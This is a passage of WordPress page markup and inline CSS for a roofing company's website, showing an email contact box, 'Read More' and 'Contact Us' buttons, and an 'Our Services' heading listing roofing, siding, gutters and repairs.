.skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:600;font-family:Poppins;margin-bottom:5px\">Email Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">admin@dunriteroof.com</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Read More\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"bf607241-86b3-436c-b825-588f4943f62b\",\"vPadding\":15,\"hPadding\":35,\"vMargin\":0,\"hMargin\":0,\"borderRadius\":50,\"borderStyle\":\"none\",\"borderColor\":\"#ffffff\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":16,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 0px !important; margin-bottom: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 15px; padding-bottom: 15px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: #ffffff; border-radius: 50px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 16px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 16px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-bf607241-86b3-436c-b825-588f4943f62b skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Read More</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ec57e435-714e-4975-952b-ed92e27ed276\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-2\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-2 skt-blocks-block-section-outer-wrap block-ec57e435-714e-4975-952b-ed92e27ed276 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ec57e435-714e-4975-952b-ed92e27ed276 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ec57e435-714e-4975-952b-ed92e27ed276 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ec57e435-714e-4975-952b-ed92e27ed276 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-ec57e435-714e-4975-952b-ed92e27ed276.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ec57e435-714e-4975-952b-ed92e27ed276.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-ec57e435-714e-4975-952b-ed92e27ed276.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ec57e435-714e-4975-952b-ed92e27ed276.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ec57e435-714e-4975-952b-ed92e27ed276.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-ec57e435-714e-4975-952b-ed92e27ed276 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ec57e435-714e-4975-952b-ed92e27ed276 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec57e435-714e-4975-952b-ed92e27ed276.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ec57e435-714e-4975-952b-ed92e27ed276 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec57e435-714e-4975-952b-ed92e27ed276.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ec57e435-714e-4975-952b-ed92e27ed276 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec57e435-714e-4975-952b-ed92e27ed276.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"158f9bfc-d2b9-42eb-a8e5-6e47c7efa463\"} -->\n<style type=\"text/css\"> .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"leftPadding\":15,\"leftPaddingTablet\":15,\"blockId\":\"a48ef254-6b43-4feb-8c98-8e16ec4b8e54\"} -->\n<style type=\"text/css\"> .block-a48ef254-6b43-4feb-8c98-8e16ec4b8e54 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-a48ef254-6b43-4feb-8c98-8e16ec4b8e54 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-a48ef254-6b43-4feb-8c98-8e16ec4b8e54 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-a48ef254-6b43-4feb-8c98-8e16ec4b8e54 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a48ef254-6b43-4feb-8c98-8e16ec4b8e54 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-a48ef254-6b43-4feb-8c98-8e16ec4b8e54\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"ef3dd585-c3d3-4834-b0d3-f1366fbd631e\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Roofing, Siding, Gutters, Repairs</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"rightPadding\":15,\"blockId\":\"fe4fc405-1b76-43db-8c2c-923bb96f2ab2\"} -->\n<style type=\"text/css\"> .block-fe4fc405-1b76-43db-8c2c-923bb96f2ab2 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-fe4fc405-1b76-43db-8c2c-923bb96f2ab2 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-fe4fc405-1b76-43db-8c2c-923bb96f2ab2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 15px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-fe4fc405-1b76-43db-8c2c-923bb96f2ab2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fe4fc405-1b76-43db-8c2c-923bb96f2ab2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-fe4fc405-1b76-43db-8c2c-923bb96f2ab2\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Contact Us\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"ad526e6a-3ac5-4787-98b4-b4a08deb4fd3\",\"vPadding\":13,\"hPadding\":27,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 13px; padding-bottom: 13px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 27px; padding-right: 27px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 